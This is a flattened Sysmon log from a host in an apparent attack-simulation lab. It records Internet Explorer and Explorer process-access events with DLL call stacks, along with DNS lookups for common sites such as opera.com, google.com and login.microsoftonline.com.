C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 22542200x800000000000000013597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.449{59A5CD1D-9410-6005-0E05-00000000A301}6584cdn-production-opera-website.operacdn.com0type: 5 cdn-production-opera-website.operacdn.com.edgekey.net;type: 5 e11604.dscf.akamaiedge.net;::ffff:173.223.168.58;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.415{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:216.58.208.35;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.384{59A5CD1D-9410-6005-0E05-00000000A301}6584www.google.com0::ffff:172.217.16.164;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.272{59A5CD1D-9410-6005-0E05-00000000A301}6584www.opera.com0type: 5 front-geo.production.opera-website.route53.opera.com;::ffff:52.57.194.196;::ffff:35.156.154.196;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.026{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.571{59A5CD1D-9410-6005-0E05-00000000A301}6584login.microsoftonline.com0type: 5 a.privatelink.msidentity.com;type: 5 prda.aadg.msidentity.com;type: 5 www.tm.a.prd.aadg.akadns.net;::ffff:40.126.31.135;::ffff:40.126.31.137;::ffff:40.126.31.141;::ffff:20.190.159.134;::ffff:20.190.159.136;::ffff:40.126.31.1;::ffff:40.126.31.6;::ffff:40.126.31.8;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.300{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.280{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.280{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.268{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+593ffd(wow64) 10341000x800000000000000013600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.240{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.224{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.224{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.613{59A5CD1D-8E56-6005-2E00-00000000A301}246458.168.223.173.in-addr.arpa.0type: 12 a173-223-168-58.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 